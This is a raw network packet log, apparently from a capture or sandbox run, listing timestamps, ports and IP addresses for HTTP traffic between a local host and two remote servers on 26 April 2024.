Apr 26, 2024 17:11:12.300712109 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300740957 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300771952 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300792933 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300812006 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300832987 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300865889 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300884008 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300901890 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300920010 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300941944 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.300952911 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.300977945 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301001072 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301018953 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301019907 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301070929 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301074028 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301090956 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301107883 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301126003 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301142931 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301158905 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301177025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301181078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301212072 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301229954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301260948 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301299095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301306963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301351070 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301369905 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301388025 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301388979 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301425934 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301430941 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301449060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301484108 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301501036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301532030 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301548004 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301567078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301687002 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301703930 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301734924 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301752090 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301793098 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.301820040 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301886082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301903009 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.301924944 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.302089930 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.302107096 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.302140951 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.318020105 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.318079948 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.318093061 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.318129063 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.320565939 CEST	49714	80	192.168.2.5	185.172.128.76
Apr 26, 2024 17:11:12.477528095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.522041082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.522093058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.522144079 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.522162914 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.522181988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.522219896 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.522257090 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.522267103 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.522291899 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.522299051 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.523494005 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.523531914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.523545027 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.523713112 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.523751020 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.523763895 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524000883 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524039030 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524051905 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524075985 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524132967 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524169922 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524183035 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524205923 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524233103 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524241924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524276972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524312973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524324894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524348021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524384975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524420023 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524435997 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524435997 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524456024 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524491072 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524507046 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524527073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524564028 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524571896 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524599075 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524635077 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524648905 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524691105 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524728060 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524733067 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524764061 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524800062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524837971 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524854898 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524873972 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524883986 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.524909019 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524945021 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524981022 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.524996996 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.525017023 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.525018930 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.525053978 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.525099039 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.525845051 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.525883913 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526010036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526046991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526048899 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.526093006 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.526118040 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526249886 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526285887 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526299953 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.526324034 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526360035 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526396036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526412964 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.526432037 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526479959 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.526575089 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526633978 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526690006 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.526818991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526878119 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.526887894 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.526988983 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.527028084 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.527050018 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.527873039 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.527926922 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.527928114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.527966022 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528001070 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528053045 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528063059 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.528120041 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.528152943 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528237104 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528274059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528310061 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528323889 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.528346062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528354883 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.528382063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528417110 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528451920 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.528453112 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528487921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528495073 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.528525114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528559923 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528568983 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.528597116 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528633118 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528670073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528675079 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.528704882 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528711081 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.528740883 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.528939962 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.553544044 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553601980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553638935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553653955 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.553674936 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553739071 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553777933 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553781033 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.553812981 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553816080 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.553848982 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553884029 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553920031 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.553921938 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.553957939 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.554672003 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.554713011 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.554750919 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.554786921 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.554800987 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.554824114 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.554835081 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.554860115 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.554894924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.554929018 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.554938078 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.554965973 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.554991007 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.556880951 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.556925058 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.556929111 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.556966066 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557002068 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557027102 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.557214975 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557252884 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557279110 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.557288885 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557324886 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557332993 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.557360888 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557395935 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.557396889 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557801962 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557841063 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557852030 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.557878971 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557917118 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557952881 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557955027 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.557987928 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.557990074 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.559489965 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559534073 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559541941 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.559572935 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559611082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559612036 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.559648037 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559684992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559693098 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.559746027 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559787989 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.559823036 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559859991 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559895039 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.559935093 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.559967041 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560003042 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560029030 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.560039997 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560075998 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560185909 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.560195923 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560231924 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560240984 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.560269117 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560305119 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560338974 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560345888 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.560375929 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560379028 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.560414076 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560450077 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560467958 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.560486078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560520887 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560550928 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.560558081 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560614109 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.560780048 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560817957 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.560892105 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.561165094 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.561239004 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.561275959 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.561311007 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.561322927 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.561347008 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.561352968 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.561383963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.561419964 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.561471939 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.561969042 CEST	80	49714	185.172.128.76	192.168.2.5
Apr 26, 2024 17:11:12.569705963 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569724083 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569741011 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569760084 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.569765091 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569781065 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569796085 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569809914 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.569812059 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569830894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.569848061 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569864988 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569865942 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.569883108 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569899082 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569916010 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569930077 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.569958925 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.569972992 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.569988966 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570004940 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570020914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570035934 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.570077896 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.570436954 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570488930 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.570612907 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570691109 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570736885 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.570756912 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570774078 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570790052 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570806980 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570837021 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.570867062 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570904970 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.570908070 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570926905 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570943117 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570960999 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.570988894 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571003914 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571049929 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571049929 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571113110 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571149111 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571197033 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571233034 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571269989 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571278095 CEST	49713	80	192.168.2.5	176.97.76.106
Apr 26, 2024 17:11:12.571305990 CEST	80	49713	176.97.76.106	192.168.2.5
Apr 26, 2024 17:11:12.571341991 CEST	80	49713	176.97.76.106	192.168.2.5
